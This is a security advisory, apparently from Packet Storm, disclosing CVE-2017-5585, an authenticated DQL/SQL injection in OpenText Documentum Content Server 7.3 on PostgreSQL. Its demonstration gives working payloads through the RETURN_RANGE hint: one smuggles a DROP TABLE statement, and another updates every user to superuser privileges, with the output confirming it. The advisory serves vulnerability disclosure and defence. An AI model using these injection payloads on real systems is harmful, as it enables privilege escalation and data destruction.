OpenText Documentum Content Server version 7.3 suffers from a remote SQL injection vulnerability due to a previously announced fix being incomplete.
ace149b822a50c7993d6f686c8031fafa0ff63437d3e979c07952eb853919ff7CVE Identifier: CVE-2017-5585
Vendor: OpenText
Affected products: OpenText Documentum Content Server 7.3 (PostgreSQL builds only)
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available
Description:
Previously announced fix for CVE-2014-2520 seems to be incomplete: when PostgreSQL Database is used and return_top_results_row_based config option is set to false, Content Server does not properly restrict DQL hints, which allows remote authenticated users to conduct DQL injection attacks and execute arbitrary DML/DDL statements on the target system via crafted request.
Demonstration:
================================================================8<==============================================================
Connecting to Server using docbase DCTM_PSQL
[DM_SESSION_I_SESSION_START]info: "Session 0102987880002902 started for user dm_bof_registry."
Connected to Documentum Server running Release 7.3.0000.0214 Linux64.Postgres
--
-- Amount of superusers in Documentum repository
--
1> select count(*) from dm_user where user_privileges=16
2> go
count
------------
1
(1 row affected)
--
-- Demonstration or how Content Server translates DQL query to SQL
--
1> select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;drop table dm_user_s;')
2> go
[DM_QUERY_E_CURSOR_ERROR]error:
"A database error has occurred during the creation of a cursor
(' STATE=2BP01, CODE=7, MSG=ERROR: cannot drop table dm_user_s because other objects depend on it;
Error while executing the query')."
1> exec get_last_sql
2> go
result
-------------------------------------------------------------------------------------------
select all CAST(count(*) as int) from dm_user_sp dm_user order by 1;drop table dm_user_s; 1321 Commit 1321 Commit
(1 row affected)
--
-- Exploitation
--
1> select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;update dm_user_s set user_privileges=16;')
2> go
count
------------
67
(1 row affected)
--
-- Amount of superusers in Documentum repository after exploitation
--
1> select count(*) from dm_user where user_privileges=16
2> go
count
------------
67
(1 row affected)
1>
================================================================>8==============================================================
Disclosure timeline:
2014.02.22: Vulnerability discovered
2017.01.25: CVE Identifier assigned
2017.02.01: Vendor contacted, no response
2017.02.15: Public disclosure
__
Regards,
Andrey B. Panfilov
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed